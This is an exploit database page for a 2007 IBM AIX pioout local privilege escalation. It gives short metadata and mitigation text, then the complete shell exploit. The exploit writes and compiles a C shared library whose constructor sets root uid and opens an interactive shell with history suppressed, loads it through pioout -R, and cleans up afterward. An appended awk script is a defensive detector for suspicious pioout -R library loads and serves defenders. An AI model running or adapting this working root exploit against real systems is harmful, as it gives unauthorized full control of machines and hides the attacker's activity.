Vendor: AIX
By: qaaz
CVSS: 7.5 HIGH
Local Privilege Escalation
CWE: 269
Product Name: AIX
Affected Version From: Up to 5.3 sp6
Affected Version To: Up to 5.3 sp6
Patch Exists: NO
Related CWE:
CPE: o:ibm:aix:5.3
Metasploit:
Other Scripts:
Platforms Tested: AIX
2007

AIX pioout Local Root Exploit

This exploit allows an attacker to escalate their privileges to root on IBM AIX versions up to 5.3 sp6. It takes advantage of a vulnerability in the AIX pioout command.

Mitigation:

Apply the latest patches and updates from IBM to fix the vulnerability. Additionally, restrict access to the affected system to trusted users only.

Exploit-DB raw data:

#!/bin/sh
#
# 07/2007: public release
# IBM AIX <= 5.3 sp6
#
echo "-------------------------------"
echo " AIX pioout Local Root Exploit "
echo " By qaaz"
echo "-------------------------------"
cat >piolib.c <<_EOF_
#include <stdlib.h>
#include <unistd.h>
void init() __attribute__ ((constructor));
void init()
{
	seteuid(0);
	setuid(0);
	putenv("HISTFILE=/dev/null");
	execl("/bin/bash", "bash", "-i", (void *) 0);
	execl("/bin/sh", "sh", "-i", (void *) 0);
	perror("execl");
	exit(1);
}
_EOF_
gcc piolib.c -o piolib -shared -fPIC
[ -r piolib ] && /usr/lpd/pio/etc/pioout -R ./piolib
rm -f piolib.c piolib

# milw0rm.com [2007-07-27]
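
One way to watch for the invocation the script above relies on (`pioout -R` with a caller-supplied library): an added detection example, not part of the original exploit or of any IBM tooling. The record format, the `TRUSTED_PREFIX` allowlist and the function names are assumptions, and the sample records are constructed.

```shell
#!/bin/sh
# Added example: flag pioout -R invocations that load a library from an
# untrusted path. Record format and allowlist are assumptions.

# Assumption: the only directory from which -R libraries are expected.
TRUSTED_PREFIX="/usr/lpd/pio/"

# Constructed sample records (not real logs): "uid=<n> cmd=<command line>"
sample_records() {
    cat <<'EOF'
uid=0 cmd=/usr/lpd/pio/etc/pioout
uid=204 cmd=/usr/lpd/pio/etc/pioout -R ./piolib
uid=204 cmd=/usr/bin/ls -R /tmp
uid=311 cmd=/usr/lpd/pio/etc/pioout -R/tmp/lib311
uid=0 cmd=/usr/lpd/pio/etc/pioout -R /usr/lpd/pio/etc/site_lib
uid=204 cmd=/usr/lpd/pio/etc/pioout -R /usr/lpd/pio/../../tmp/piolib
EOF
}

# Reads records on stdin, prints one ALERT line per suspicious -R argument.
flag_pioout_R() {
    awk -v trusted="$TRUSTED_PREFIX" '
    {
        uid = $1; sub(/^uid=/, "", uid)
        cmd = $2; sub(/^cmd=/, "", cmd)
        # Only the binary named on the page; "ls -R" must not match.
        if (cmd !~ /(^|\/)pioout$/) next
        for (i = 3; i <= NF; i++) {
            path = ""
            if ($i == "-R" && i < NF) path = $(i + 1)   # "-R path"
            else if ($i ~ /^-R./) path = substr($i, 3)  # "-Rpath"
            if (path == "") continue
            # Relative paths, paths outside the allowlist, and ".."
            # traversal out of it are all reported.
            if (index(path, trusted) != 1 || path ~ /\.\./)
                printf "ALERT uid=%s lib=%s\n", uid, path
        }
    }'
}

sample_records | flag_pioout_R
```

Feed it process-execution records from whatever auditing the host already has, converted to the one-line format shown in `sample_records`.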